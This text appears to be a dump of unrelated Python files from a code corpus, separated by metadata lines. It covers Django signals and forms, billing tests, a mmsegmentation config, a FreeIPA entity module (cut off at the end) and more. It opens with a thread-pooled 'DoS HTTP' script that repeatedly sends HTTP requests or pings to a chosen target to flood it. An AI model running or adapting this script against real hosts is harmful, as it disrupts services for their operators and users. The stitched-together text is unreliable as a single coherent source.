valid_attacks = {HTTP_ATTACK, ICMP_ATTACK}
parser = argparse.ArgumentParser(description="DoS HTTP")
parser.add_argument('-P', '--poolsize', default=10, help='Size of the threadpool')
parser.add_argument('-T', '--target', default='localhost', help='Target URL for http request')
parser.add_argument('-D', '--delay', default=0, help='Amount of time to wait between requests')
parser.add_argument('-A', '--attack', required=True, help='Type of attack (e.g. HTTP, ICMP)')
args = parser.parse_args()
threadpool_size = int(args.poolsize)
target = args.target
delay = int(args.delay)
attack = args.attack.upper()
if attack not in valid_attacks:
print(f"Invalid attack type, must be one of: {valid_attacks}")
exit()
terminate = False
def http_request(url):
global terminate
while True and not terminate:
response = requests.get(url)
if not response.ok:
print(f"{str(datetime.now())[:-3]} !!! HTTP request failed, code: {response.status_code}")
else:
print(f"{str(datetime.now())[:-3]} ---> HTTP request successful")
if delay > 0:
for _ in range(0, delay): sleep(1)
print("...http_request thread terminated")
def ping_host(ip):
global terminate
while True and not terminate:
try:
subprocess.check_output(["ping", "-c3", "-n", "-i0.5", "-W2", ip])
print(f"{str(datetime.now())[:-3]} ---> Ping successful: {ip}")
except subprocess.CalledProcessError:
print(f"{str(datetime.now())[:-3]} !!! Ping failed: {ip}")
if delay > 0:
for _ in range(0, delay): sleep(1)
def main():
global terminate
try:
targets = [target for _ in range(0, threadpool_size)]
with ThreadPoolExecutor(max_workers=threadpool_size) as executor:
if attack == HTTP_ATTACK:
executor.map(http_request, targets)
elif attack == ICMP_ATTACK:
executor.map(ping_host, targets)
else:
return # should not have gotten here
except KeyboardInterrupt:
print("... terminating application ...", end="")
terminate = True
print("terminated")
if __name__ == "__main__":
main()
| 2.65625 | 3 |
maestro/backends/django/contrib/signals.py | estudio89/maestro-python | 0 | 6859 | <gh_stars>0
from django.apps import apps
from django.db import models
from django.db.models.signals import post_save, pre_delete
from typing import Type, Optional, List, cast, TYPE_CHECKING
from maestro.backends.django.settings import maestro_settings
from maestro.backends.django.contrib.factory import create_django_data_store
from maestro.backends.django.utils import model_to_entity_name
from maestro.core.metadata import Operation
from .middleware import _add_operation_to_queue
import copy
if TYPE_CHECKING:
from maestro.backends.django import DjangoDataStore
def model_saved_signal(
sender: "Type[models.Model]",
instance: "models.Model",
created: "bool",
raw: "bool",
using: "str",
update_fields: "Optional[List[str]]",
**kwargs,
):
operation: "Operation"
if created:
operation = Operation.INSERT
else:
operation = Operation.UPDATE
data_store: "DjangoDataStore" = create_django_data_store()
entity_name = model_to_entity_name(instance)
data_store.commit_item_change(
operation=operation,
entity_name=entity_name,
item_id=str(instance.pk),
item=copy.deepcopy(instance),
execute_operation=False,
)
_add_operation_to_queue(operation=operation, item=copy.deepcopy(instance))
def model_pre_delete_signal(
sender: "Type[models.Model]", instance: "models.Model", using: "str", **kwargs
):
data_store: "DjangoDataStore" = create_django_data_store()
entity_name = model_to_entity_name(instance)
data_store.commit_item_change(
operation=Operation.DELETE,
entity_name=entity_name,
item_id=str(instance.pk),
item=copy.deepcopy(instance),
execute_operation=False,
)
_add_operation_to_queue(operation=Operation.DELETE, item=copy.deepcopy(instance))
def _connect_signal(model: "models.Model"):
full_label = (
cast("str", model._meta.app_label) + "_" + cast("str", model._meta.model_name)
)
post_save.connect(
receiver=model_saved_signal,
sender=model,
dispatch_uid=full_label + "_update_sync",
)
pre_delete.connect(
receiver=model_pre_delete_signal,
sender=model,
dispatch_uid=full_label + "_delete_sync",
)
def connect_signals():
for app_model in maestro_settings.MODELS:
model = apps.get_model(app_model)
_connect_signal(model=model)
def _disconnect_signal(model: "models.Model"):
full_label = (
cast("str", model._meta.app_label) + "_" + cast("str", model._meta.model_name)
)
post_save.disconnect(
receiver=model_saved_signal,
sender=model,
dispatch_uid=full_label + "_update_sync",
)
pre_delete.disconnect(
receiver=model_pre_delete_signal,
sender=model,
dispatch_uid=full_label + "_delete_sync",
)
class _DisableSignalsContext:
def __init__(self, model: "Type[models.Model]"):
self.model = model
def __enter__(self):
_disconnect_signal(model=self.model)
def __exit__(self, type, value, traceback):
label = self.model._meta.app_label + "." + self.model._meta.model_name
enabled_models = [label.lower() for label in maestro_settings.MODELS]
if label in enabled_models:
_connect_signal(model=self.model)
def temporarily_disable_signals(model: "Type[models.Model]"):
return _DisableSignalsContext(model=model)
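# Usage sketch (added note; "Book" is a hypothetical model listed in
# maestro_settings.MODELS): inside the block the post_save/pre_delete handlers
# above are disconnected, so no ItemChange is committed for the write.
#
#     with temporarily_disable_signals(Book):
#         Book.objects.create(title="bulk import, not tracked")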
| 1.992188 | 2 |
top/urls.py | pbexe/nextbike-top | 0 | 6860 | from django.urls import include, path
from .views import home, bike
urlpatterns = [
path("", home),
path("bike/<int:number>", bike)
] | 1.789063 | 2 |
Scripts/ReduceFragments.py | mike72353/FragFeatureNet | 1 | 6861 | """
Remove Fragments not in Knowledgebase
"""
__author__ = "<NAME>"
__email__ = "<EMAIL>"
__copyright__ = "Copyright 2019, Hong Kong University of Science and Technology"
__license__ = "3-clause BSD"
from argparse import ArgumentParser
import numpy as np
import pickle
parser = ArgumentParser(description="Build Files")
parser.add_argument("--datadir", type=str, default="Data", help="input - XXX.YYY ")
parser.add_argument("--envNewAcronym", type=str, default="PRT.SNW", help="input - XXX.YYY ")
args = parser.parse_args()
# Check the Bound Fragments
BoundFrags = np.loadtxt("../%s/%s/%s.Homogenised.boundfrags_zeros.txt" %(args.datadir, args.envNewAcronym, args.envNewAcronym), delimiter=',')
normalDF = pickle.load(open("../%s/GrandCID.dict" %(args.datadir), "rb"))
binding = np.full(BoundFrags.shape,-1)
mlength = 0
for r, i in enumerate(BoundFrags):
for c, j in enumerate(i[i!=0]):
try:
# Checks whether the Fragment can be found in the 59k Fragment Base
binding[r,c]=normalDF.index.get_loc(int(j))
        except KeyError:
            # fragment ID not present in the 59k-fragment knowledgebase index
            continue
temp = binding[r]
if temp[temp!=-1].shape[0] > mlength:
mlength = temp[temp!=-1].shape[0]
print(mlength) #Finds the maximum number of Fragments per environment -> 705
indices = np.empty(binding.shape[0])
red_binding = np.full((binding.shape[0], mlength), -1)
for j, i in enumerate(binding):
indices[j] = i[i!=-1].shape[0]
red_binding[j][:int(indices[j])] = i[i!=-1]
red_binding = np.delete(red_binding, np.where(indices==0), axis=0)
pickle.dump(red_binding, open("../%s/%s/%s.binding.mtr" %(args.datadir, args.envNewAcronym, args.envNewAcronym), "wb"))
# Removes environments without binding Fragments
Features_all = pickle.load(open("../%s/%s/%s.Homogenised.property.pvar" %(args.datadir, args.envNewAcronym, args.envNewAcronym), "rb"))
Features_all = np.delete(Features_all, np.where(indices==0), axis=0)
pickle.dump(Features_all, open("../%s/%s/%s.Homogenised.property.pvar" %(args.datadir, args.envNewAcronym, args.envNewAcronym), "wb"))
# Removes environment annotiation without binding fragments
with open("../%s/%s/%s.Homogenised.annotation.txt" %(args.datadir, args.envNewAcronym, args.envNewAcronym), "r+") as f:
lines = f.readlines()
for i in np.where(indices==0)[0][::-1]:
del lines[i]
f.seek(0)
f.truncate()
f.writelines(lines)
| 2.453125 | 2 |
client/core/tests/billing_tests.py | vbohinc/CommunityCellularManager | 0 | 6862 | """Tests for core.billing.
Run this test from the project root
$ nosetests core.tests.billing_tests
Copyright (c) 2016-present, Facebook, Inc.
All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import random
import math
from core.billing import get_call_cost
from core.billing import get_prefix_from_number
from core.billing import get_sms_cost
from core.billing import process_prices
from core.billing import round_to_billable_unit
from core.billing import round_up_to_nearest_100
from core import config_database
TARIFF = 100
class GetCostTest(unittest.TestCase):
"""Testing core.billing.get_call_cost."""
@classmethod
def setUpClass(cls):
# Setup the config db.
cls.config_db = config_database.ConfigDB()
cls.config_db['bts_secret'] = 'hokay'
cls.config_db['free_seconds'] = '5'
cls.config_db['billable_unit'] = '1'
# Setup some price data like what would be sent back from the cloud.
price_data = [
{
'directionality': 'off_network_send',
'prefix': '509',
'country_name': 'Haiti',
'country_code': 'HT',
'cost_to_subscriber_per_sms': 900,
'cost_to_subscriber_per_min': 1100,
'billable_unit': 1,
}, {
'directionality': 'off_network_send',
'prefix': '56',
'country_name': 'Chile',
'country_code': 'CL',
'cost_to_subscriber_per_sms': 1000,
'cost_to_subscriber_per_min': 800,
'billable_unit': 1,
}, {
'directionality': 'off_network_send',
'prefix': '63',
'country_name': 'Philippines',
'country_code': 'PH',
'cost_to_subscriber_per_sms': 100,
'cost_to_subscriber_per_min': 600,
'billable_unit': 30,
}, {
'directionality': 'off_network_receive',
'cost_to_subscriber_per_sms': 200,
'cost_to_subscriber_per_min': 100,
'billable_unit': 1,
}, {
'directionality': 'on_network_send',
'cost_to_subscriber_per_sms': 400,
'cost_to_subscriber_per_min': 300,
'billable_unit': 1,
}, {
'directionality': 'on_network_receive',
'cost_to_subscriber_per_sms': 500,
'cost_to_subscriber_per_min': 200,
'billable_unit': 1,
}
]
# Populate the config db with prices
process_prices(price_data, cls.config_db)
def test_on_receive_call(self):
"""We can get the subscriber price for an on-network received call."""
billable_seconds = 170
# Recall that the expected cost is rounded to the nearest value of 100.
expected_cost = 600
self.assertEqual(expected_cost,
get_call_cost(billable_seconds, 'on_network_receive'))
def test_on_receive_sms(self):
"""We can get the subscriber price for an on-network received SMS."""
expected_cost = 500
self.assertEqual(expected_cost, get_sms_cost('on_network_receive'))
def test_off_receive_call(self):
"""We can get the subscriber price for an off-network received call."""
billable_seconds = 700
expected_cost = 1200
self.assertEqual(
expected_cost,
get_call_cost(billable_seconds, 'off_network_receive'))
def test_off_receive_sms(self):
"""We can get the subscriber price for an off-network received SMS."""
expected_cost = 200
self.assertEqual(expected_cost, get_sms_cost('off_network_receive'))
def test_on_send_call(self):
"""We can get the subscriber price for an on-network sent call."""
billable_seconds = 190
expected_cost = 1000
self.assertEqual(expected_cost,
get_call_cost(billable_seconds, 'on_network_send'))
def test_on_send_sms(self):
"""We can get the subscriber price for an on-network sent SMS."""
expected_cost = 400
self.assertEqual(expected_cost, get_sms_cost('on_network_send'))
def test_call_to_chile(self):
"""We can get the cost of a call to Chile."""
billable_seconds = 830
expected_cost = 11000
number = ''.join(['56', '1235554567'])
actual_cost = get_call_cost(billable_seconds, 'off_network_send',
destination_number=number)
self.assertEqual(expected_cost, actual_cost)
def test_sms_to_chile(self):
"""We can get the price to a subscriber of an SMS sent to Chile."""
expected_cost = 1000
number = ''.join(['56', '1235554567'])
actual_cost = get_sms_cost('off_network_send',
destination_number=number)
self.assertEqual(expected_cost, actual_cost)
def test_call_to_ph(self):
""" We bill for calls to PH correctly. """
billable_seconds = 70
expected_cost = 900
number = ''.join(['63', '5551234567'])
actual_cost = get_call_cost(billable_seconds, 'off_network_send',
destination_number=number)
self.assertEqual(expected_cost, actual_cost)
def test_nonexistent_prefix(self):
"""If the prefix doesn't exist, it's free.
The prefix price key might not exist if, say, the billing tier data
has not yet been loaded.
"""
expected_cost = 0
number = ''.join(['9999', '1235554567'])
actual_cost = get_sms_cost('off_network_send',
destination_number=number)
self.assertEqual(expected_cost, actual_cost)
class GetPrefixFromNumberTest(unittest.TestCase):
"""Testing core.billing.get_prefix_from_number."""
@classmethod
def setUpClass(cls):
# Setup the config db.
cls.config_db = config_database.ConfigDB()
cls.config_db['bts_secret'] = 'yup'
# Load up some pricing data into the config db. We use this data to
# determine what prefixes are available.
# 2015dec9(shasan): This is a legacy billing response, lacking billable
# units. This also tests we can handle that case.
price_data = [
{
'directionality': 'off_network_send',
'prefix': '789',
'country_name': 'Ocenaia',
'country_code': 'OC',
'cost_to_subscriber_per_sms': 300,
'cost_to_subscriber_per_min': 20,
}, {
'directionality': 'off_network_send',
'prefix': '78',
'country_name': 'Eurasia',
'country_code': 'EU',
'cost_to_subscriber_per_sms': 400,
'cost_to_subscriber_per_min': 10,
}, {
'directionality': 'off_network_send',
'prefix': '7',
'country_name': 'Eastasia',
'country_code': 'EA',
'cost_to_subscriber_per_sms': 500,
'cost_to_subscriber_per_min': 30,
}, {
'directionality': 'off_network_send',
'prefix': '3',
'country_name': 'London',
'country_code': 'LN',
'cost_to_subscriber_per_sms': 5000,
'cost_to_subscriber_per_min': 3000,
}
]
# Populate the config db with prices
process_prices(price_data, cls.config_db)
def test_get_one_digit_prefix(self):
"""We can get a one digit prefix."""
number = ''.join(['7', '1235557890'])
self.assertEqual('7', get_prefix_from_number(number))
def test_get_two_digit_prefix(self):
"""We can get a two digit prefix."""
number = ''.join(['78', '1235557890'])
self.assertEqual('78', get_prefix_from_number(number))
def test_get_three_digit_prefix(self):
"""We can get a three digit prefix."""
number = ''.join(['789', '1235557890'])
self.assertEqual('789', get_prefix_from_number(number))
def test_get_one_digit_uncommon_prefix(self):
"""We can get a one digit uncommon prefix."""
number = ''.join(['3', '1235557890'])
self.assertEqual('3', get_prefix_from_number(number))
class RoundCostToBillableUnit(unittest.TestCase):
"""Testing core.billing.round_to_billable_unit."""
def test_billable_unit_rounding_sans_free_seconds(self):
for i in range(100):
billsec = random.randint(1, 5000)
expected_cost = int(billsec * (TARIFF / 60.0))
print('%s seconds should cost %s' % (billsec, expected_cost))
self.assertEqual(expected_cost,
round_to_billable_unit(billsec, TARIFF))
def test_billable_unit_rounding_with_free_seconds(self):
for i in range(100):
billsec = random.randint(100, 5000)
free = random.randint(1, 100)
expected_cost = int((billsec - free) * (TARIFF / 60.0))
print('%s seconds with %s free should cost %s' %
(billsec, free, expected_cost))
self.assertEqual(expected_cost,
round_to_billable_unit(billsec, TARIFF, free))
    def test_billable_unit_rounding_with_units(self):
        """Test the "rows" of this table: (billsec, rate, free, unit, expected_cost)."""
tests = [
# base case
(0, 60, 0, 30, 0),
# call too short
(5, 60, 0, 30, 30),
# changing the units
(5, 60, 0, 60, 60),
# call slightly too long
(61, 60, 0, 60, 120),
# weird non-uniform per minute
(61, 72, 0, 30, 108),
# including free seconds
(61, 60, 10, 60, 60)
]
for test in tests:
billsec = test[0]
rate = test[1]
free = test[2]
unit = test[3]
expected_cost = test[4]
actual_cost = round_to_billable_unit(billsec, rate, free, unit)
print('%s sec with %s free and a unit of %s sec '
'expected cost %s, actual cost %s' %
(billsec, free, unit, expected_cost, actual_cost))
self.assertEqual(expected_cost, actual_cost)
class RoundCostUpToNearest100(unittest.TestCase):
"""Testing core.billing.round_up_to_nearest_100."""
def test_round_negatives(self):
# test negatives
for i in [-10000, -100, -1]:
self.assertEqual(0, round_up_to_nearest_100(i))
def test_round_positives(self):
for i in range(0, 5000):
self.assertEqual(int(math.ceil(i / float(100))) * 100,
round_up_to_nearest_100(i))
| 2.265625 | 2 |
data_interrogator/admin/views.py | s-i-l-k-e/django-data-interrogator | 0 | 6863 | <reponame>s-i-l-k-e/django-data-interrogator
from django.contrib.auth.decorators import user_passes_test
from django.utils.decorators import method_decorator
from data_interrogator.admin.forms import AdminInvestigationForm, AdminPivotTableForm
from data_interrogator.interrogators import Allowable
from data_interrogator.views import InterrogationView, InterrogationAutocompleteUrls, PivotTableView, \
InterrogationAutoComplete
class AdminInterrogationRoom(InterrogationView):
template_name = 'admin/analytics/analytics.html'
form_class = AdminInvestigationForm
report_models = Allowable.ALL_MODELS
allowed = Allowable.ALL_APPS
excluded = []
@method_decorator(user_passes_test(lambda u: u.is_superuser))
def get(self, request):
return super(AdminInterrogationRoom,self).get(request)
class AdminInterrogationAutocompleteUrls(InterrogationAutocompleteUrls):
interrogator_view_class = AdminInterrogationRoom
interrogator_autocomplete_class = InterrogationAutoComplete
class AdminPivotTableView(PivotTableView):
form_class = AdminPivotTableForm
template_name = 'admin/analytics/pivot.html'
| 1.882813 | 2 |
configs/pspnet/pspnet_r18-d8_512x512_80k_loveda.py | heytanay/mmsegmentation | 11 | 6864 | <filename>configs/pspnet/pspnet_r18-d8_512x512_80k_loveda.py
_base_ = './pspnet_r50-d8_512x512_80k_loveda.py'
model = dict(
backbone=dict(
depth=18,
init_cfg=dict(
type='Pretrained', checkpoint='open-mmlab://resnet18_v1c')),
decode_head=dict(
in_channels=512,
channels=128,
),
auxiliary_head=dict(in_channels=256, channels=64))
| 1.210938 | 1 |
bba/objects.py | TheGenocides/BBA | 3 | 6865 | <reponame>TheGenocides/BBA
from typing import Dict, Any
class ResponseObject:
def __init__(self, data: Dict[str, Any]):
self.payload = data
for k, v in data.items():
setattr(self, k, v) | 2.34375 | 2 |
apps/greencheck/forms.py | BR0kEN-/admin-portal | 0 | 6866 | from django import forms
from django.forms import ModelForm
from django.contrib.auth import get_user_model
from django.core.exceptions import ValidationError
from .choices import ActionChoice
from .choices import StatusApproval
from .models import GreencheckIp
from .models import GreencheckIpApprove
from .models import GreencheckASN, GreencheckASNapprove
User = get_user_model()
class ApprovalMixin:
ApprovalModel = None
    def _save_approval(self):
        """
        Save an approval request, be it for an IP range or an AS network,
        when the submitting user is not staff.
        """
if self.ApprovalModel is None:
raise NotImplementedError("Approval model missing")
model_name = self.ApprovalModel._meta.model_name
if not self.cleaned_data["is_staff"]:
hosting_provider = self.instance.hostingprovider
            # "changed" indicates this approval updates an existing record rather than creating a new one
action = ActionChoice.update if self.changed else ActionChoice.new
status = StatusApproval.update if self.changed else StatusApproval.new
kwargs = {
"action": action,
"status": status,
"hostingprovider": hosting_provider,
}
if model_name == "greencheckasnapprove":
self.instance = GreencheckASNapprove(asn=self.instance.asn, **kwargs)
else:
self.instance = GreencheckIpApprove(
ip_end=self.instance.ip_end,
ip_start=self.instance.ip_start,
**kwargs
)
hosting_provider.mark_as_pending_review(self.instance)
def clean_is_staff(self):
try:
# when using this form `is_staff` should always be available
# or else something has gone wrong...
return self.data["is_staff"]
except KeyError:
raise ValidationError("Alert staff: a bug has occurred.")
class GreencheckAsnForm(ModelForm, ApprovalMixin):
ApprovalModel = GreencheckASNapprove
is_staff = forms.BooleanField(
label="user_is_staff", required=False, widget=forms.HiddenInput()
)
class Meta:
model = GreencheckASN
fields = (
"active",
"asn",
)
def save(self, commit=True):
self._save_approval()
return super().save(commit=True)
class GreencheckIpForm(ModelForm, ApprovalMixin):
    """This form is meant for the admin.
    If a non-staff user fills in the form, it returns an unsaved
    approval record instead of a GreencheckIp record.
    """
ApprovalModel = GreencheckIpApprove
is_staff = forms.BooleanField(
label="user_is_staff", required=False, widget=forms.HiddenInput()
)
class Meta:
model = GreencheckIp
fields = (
"active",
"ip_start",
"ip_end",
)
def save(self, commit=True):
"""
        If a non-staff user creates an IP, instead of saving
        the IP record directly, it will save an approval record.
        Only once it has been approved will the record actually
        be created.
        So we return an approval instance instead of a Greencheck instance,
        which in turn will get saved a bit later.
"""
self._save_approval()
return super().save(commit=commit)
class GreencheckAsnApprovalForm(ModelForm):
class Meta:
model = GreencheckASNapprove
fields = ("action", "asn", "status")
def save(self, commit=True):
instance = self.instance.greencheck_asn
if commit is True:
if instance:
instance.asn = self.instance.asn
instance.save()
else:
instance = GreencheckASN.objects.create(
active=True,
asn=self.instance.asn,
hostingprovider=self.instance.hostingprovider,
)
self.instance.greencheck_asn = instance
return super().save(commit=commit)
class GreecheckIpApprovalForm(ModelForm):
field_order = ("ip_start", "ip_end")
class Meta:
model = GreencheckIpApprove
fields = "__all__"
def save(self, commit=True):
ip_instance = self.instance.greencheck_ip
if commit is True:
if ip_instance:
                ip_instance.ip_end = self.instance.ip_end
                ip_instance.ip_start = self.instance.ip_start
ip_instance.save()
else:
ip_instance = GreencheckIp.objects.create(
active=True,
ip_end=self.instance.ip_end,
ip_start=self.instance.ip_start,
hostingprovider=self.instance.hostingprovider,
)
self.instance.greencheck_ip = ip_instance
return super().save(commit=commit)
| 2.203125 | 2 |
apps/utils/format/url_format.py | think-wang/osroom | 1 | 6867 | #!/usr/bin/env python
# -*-coding:utf-8-*-
from tld import get_tld
__author__ = "<NAME>"
def get_domain(url):
'''
    Get the full domain (subdomain + registered domain) from a URL
    :param url: URL string to parse
    :return: full domain, e.g. "www.example.com"
'''
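    # Usage sketch (hypothetical URL; the exact attributes depend on the installed
    # tld version, here the legacy API where res.tld is the registered domain):
    #     get_domain("http://www.example.com/x")  # -> "www.example.com"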
res = get_tld(url, as_object=True)
return "{}.{}".format(res.subdomain, res.tld) | 2.5625 | 3 |
ipamanager/entities.py | Tjev/freeipa-manager | 0 | 6868 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# SPDX-License-Identifier: BSD-3-Clause
# Copyright © 2017-2019, GoodData Corporation. All rights reserved.
"""
FreeIPA Manager - entity module
Object representations of the entities configured in FreeIPA.
"""
import os
import re
import voluptuous
import yaml
from abc import ABCMeta, abstractproperty
import schemas
from command import Command
from core import FreeIPAManagerCore
from errors import ConfigError, ManagerError, IntegrityError
class FreeIPAEntity(FreeIPAManagerCore):
"""
General FreeIPA entity (user, group etc.) representation.
Can only be used via subclasses, not directly.
"""
__metaclass__ = ABCMeta
    entity_id_type = 'cn'  # entity name identifier in FreeIPA
key_mapping = {} # attribute name mapping between local config and FreeIPA
ignored = [] # list of ignored entities for each entity type
allowed_members = []
def __init__(self, name, data, path=None):
"""
:param str name: entity name (user login, group name etc.)
:param dict data: dictionary of entity configuration values
:param str path: path to file the entity was parsed from;
if None, indicates creation of entity from FreeIPA
"""
super(FreeIPAEntity, self).__init__()
if not data: # may be None; we want to ensure dictionary
data = dict()
self.name = name
self.path = path
self.metaparams = data.pop('metaparams', dict())
if self.path: # created from local config
try:
self.validation_schema(data)
except voluptuous.Error as e:
raise ConfigError('Error validating %s: %s' % (name, e))
if not path.endswith('.yaml'): # created from template tool
path, name = os.path.split(self.path)
self.path = '%s.yaml' % os.path.join(
path, name.replace('-', '_'))
self.data_ipa = self._convert_to_ipa(data)
self.data_repo = data
else: # created from FreeIPA
self.data_ipa = data
self.data_repo = self._convert_to_repo(data)
def _convert_to_ipa(self, data):
"""
Convert entity data to IPA format.
:param dict data: entity data in repository format
:returns: dictionary of data in IPA format
:rtype: dict
"""
result = dict()
for key, value in data.iteritems():
new_key = self.key_mapping.get(key, key).lower()
if new_key == 'memberof':
self._check_memberof(value)
result[new_key] = value
elif isinstance(value, bool):
result[new_key] = value
elif isinstance(value, list):
result[new_key] = tuple(unicode(i) for i in value)
else:
result[new_key] = (unicode(value),)
return result
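    # Sketch of the repo -> IPA conversion above (hypothetical values): with
    # key_mapping = {'firstName': 'givenName'}, the repo data
    #     {'firstName': 'Foo', 'memberOf': {'group': ['bar']}}
    # becomes
    #     {'givenname': (u'Foo',), 'memberof': {'group': ['bar']}}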
def _convert_to_repo(self, data):
"""
Convert entity data to repo format.
:param dict data: entity data in IPA format
:returns: dictionary of data in repository format
:rtype: dict
"""
result = dict()
for attr in self.managed_attributes_pull:
if attr.lower() in data:
key = attr
# find reverse (IPA -> repo) attribute name mapping
for k, v in self.key_mapping.iteritems():
if v == attr:
key = k
break
value = data[attr.lower()]
if isinstance(value, tuple):
if len(value) > 1:
result[key] = list(value)
else:
result[key] = value[0]
else:
result[key] = value
return result
def _check_memberof(self, member_of):
for entity_type in member_of:
try:
self.get_entity_class(entity_type)
except KeyError:
raise ConfigError(
'Cannot be a member of non-existent entity type %s'
% entity_type)
def create_commands(self, remote_entity=None):
"""
Create commands to execute in order
to sync entity with its FreeIPA counterpart.
:param FreeIPAEntity remote_entity: remote entity
:returns: list of Command objects to execute
:rtype: list(Command)
"""
diff = dict()
for key in self.managed_attributes_push:
local_value = self.data_ipa.get(key.lower(), ())
if not remote_entity:
if local_value:
diff[key.lower()] = local_value
else:
remote_value = remote_entity.data_ipa.get(key.lower(), ())
if sorted(local_value) != sorted(remote_value):
diff[key.lower()] = local_value
if diff or not remote_entity: # create entity even without params
if remote_entity: # modify existing entity
command = '%s_mod' % self.entity_name
else: # add new entity
command = '%s_add' % self.entity_name
return [Command(command, diff, self.name, self.entity_id_type)]
return []
def update_repo_data(self, additional):
"""
Update repo-format data with additional attributes.
Used for adding membership attributes to data.
:param dict additional: dictionary to update entity data with
:rtype: None
"""
self.data_repo.update(additional or {})
def normalize(self):
"""
Re-structure entity's data in such a way that it can be stored
into the configuration file in a normalized format. This is used
when round-trip loading and saving a configuration.
"""
memberof = self.data_repo.pop('memberOf', None)
if memberof:
for target_type, target_list in memberof.iteritems():
memberof[target_type] = sorted(target_list)
self.data_repo['memberOf'] = memberof
def write_to_file(self):
if not self.path:
raise ManagerError(
'%s has no file path, nowhere to write.' % repr(self))
if self.metaparams:
self.data_repo.update({'metaparams': self.metaparams})
# don't write default attributes into file
for key in self.default_attributes:
self.data_repo.pop(key, None)
try:
with open(self.path, 'w') as target:
data = {self.name: self.data_repo or None}
yaml.dump(data, stream=target, Dumper=EntityDumper,
default_flow_style=False, explicit_start=True)
self.lg.debug('%s written to file', repr(self))
except (IOError, OSError, yaml.YAMLError) as e:
raise ConfigError(
'Cannot write %s to %s: %s' % (repr(self), self.path, e))
def delete_file(self):
if not self.path:
raise ManagerError(
'%s has no file path, cannot delete.' % repr(self))
try:
os.unlink(self.path)
self.lg.debug('%s config file deleted', repr(self))
except OSError as e:
raise ConfigError(
'Cannot delete %s at %s: %s' % (repr(self), self.path, e))
@staticmethod
def get_entity_class(name):
for entity_class in [
FreeIPAHBACRule, FreeIPAHBACService,
FreeIPAHBACServiceGroup, FreeIPAHostGroup, FreeIPAPermission,
FreeIPAPrivilege, FreeIPARole, FreeIPAService,
FreeIPASudoRule, FreeIPAUser, FreeIPAUserGroup]:
if entity_class.entity_name == name:
return entity_class
raise KeyError(name)
@abstractproperty
def validation_schema(self):
"""
:returns: entity validation schema
:rtype: voluptuous.Schema
"""
@abstractproperty
def managed_attributes_push(self):
"""
Return a list of properties that are managed for given entity type
when pushing configuration from local repo to FreeIPA.
NOTE: the list should NOT include attributes that are managed via
separate commands, like memberOf/memberHost/memberUser or ipasudoopt.
:returns: list of entity's managed attributes
:rtype: list(str)
"""
@property
def managed_attributes_pull(self):
"""
Return a list of properties that are managed for given entity type.
when pulling configuration from FreeIPA to local repository.
:returns: list of entity's managed attributes
:rtype: list(str)
"""
return self.managed_attributes_push
@property
def default_attributes(self):
"""
Return a list of default attributes for each entity of the given type.
These attributes will not be written into the YAML file when pulling.
:returns: list of entity's attributes that have single default value
:rtype: list(str)
"""
return []
def __repr__(self):
return '%s %s' % (self.entity_name, self.name)
def __str__(self):
return self.name
def __eq__(self, other):
return type(self) is type(other) and self.name == other.name
def __ne__(self, other):
return not (self == other)
def __gt__(self, other):
return self.name > other.name
def __lt__(self, other):
return self.name < other.name
class FreeIPAGroup(FreeIPAEntity):
"""Abstract representation a FreeIPA group entity (host/user group)."""
managed_attributes_push = ['description']
@abstractproperty
def allowed_members(self):
"""
:returns: list of entity types that can be members of this entity
:rtype: list(FreeIPAEntity)
"""
class FreeIPAHostGroup(FreeIPAGroup):
"""Representation of a FreeIPA host group entity."""
entity_name = 'hostgroup'
allowed_members = ['hostgroup']
validation_schema = voluptuous.Schema(schemas.schema_hostgroups)
class FreeIPAUserGroup(FreeIPAGroup):
"""Representation of a FreeIPA user group entity."""
entity_name = 'group'
managed_attributes_pull = ['description', 'posix']
allowed_members = ['user', 'group']
validation_schema = voluptuous.Schema(schemas.schema_usergroups)
def __init__(self, name, data, path=None):
"""
:param str name: entity name (user login, group name etc.)
:param dict data: dictionary of entity configuration values
:param str path: path to file the entity was parsed from;
if None, indicates creation of entity from FreeIPA
"""
if not path: # entity created from FreeIPA, not from config
data['posix'] = u'posixgroup' in data.get(u'objectclass', [])
super(FreeIPAUserGroup, self).__init__(name, data, path)
self.posix = self.data_repo.get('posix', True)
def can_contain_users(self, pattern):
"""
Check whether the group can contain users directly.
If the pattern is None, no restrictions are applied.
:param str pattern: regex to check name by (not enforced if empty)
"""
return not pattern or re.match(pattern, self.name)
def cannot_contain_users(self, pattern):
"""
        Check whether the group cannot contain users directly.
Used for determining if the group can be a member of a sudo/HBAC rule.
If the pattern is None, no restrictions are applied.
:param str pattern: regex to check name by (not enforced if empty)
"""
return not pattern or not re.match(pattern, self.name)
def _process_posix_setting(self, remote_entity):
posix_diff = dict()
description = None
if remote_entity:
if self.posix and not remote_entity.posix:
posix_diff = {u'posix': True}
description = 'group_mod %s (make POSIX)' % self.name
elif not self.posix and remote_entity.posix:
posix_diff = {'setattr': (u'gidnumber=',),
'delattr': (u'objectclass=posixgroup',)}
description = 'group_mod %s (make non-POSIX)' % self.name
elif not self.posix: # creation of new non-POSIX group
posix_diff = {u'nonposix': True}
return (posix_diff, description)
def create_commands(self, remote_entity=None):
"""
Create commands to execute in order to update the rule.
Extends the basic command creation with POSIX/non-POSIX setting.
:param dict remote_entity: remote rule data
:returns: list of commands to execute
:rtype: list(Command)
"""
commands = super(FreeIPAUserGroup, self).create_commands(remote_entity)
posix_diff, description = self._process_posix_setting(remote_entity)
if posix_diff:
if not commands: # no diff but POSIX setting, new command needed
cmd = Command('group_mod', posix_diff,
self.name, self.entity_id_type)
cmd.description = description
return [cmd]
else: # update POSIX setting as part of existing command
commands[0].update(posix_diff)
return commands
class FreeIPAUser(FreeIPAEntity):
"""Representation of a FreeIPA user entity."""
entity_name = 'user'
entity_id_type = 'uid'
managed_attributes_push = ['givenName', 'sn', 'initials', 'mail',
'ou', 'manager', 'carLicense', 'title']
key_mapping = {
'emailAddress': 'mail',
'firstName': 'givenName',
'lastName': 'sn',
'organizationUnit': 'ou',
'githubLogin': 'carLicense'
}
validation_schema = voluptuous.Schema(schemas.schema_users)
class FreeIPARule(FreeIPAEntity):
"""Abstract class covering HBAC and sudo rules."""
def create_commands(self, remote_entity=None):
"""
Create commands to execute in order to update the rule.
Extends the basic command creation
to account for adding/removing rule members.
:param dict remote_entity: remote rule data
:returns: list of commands to execute
:rtype: list(Command)
"""
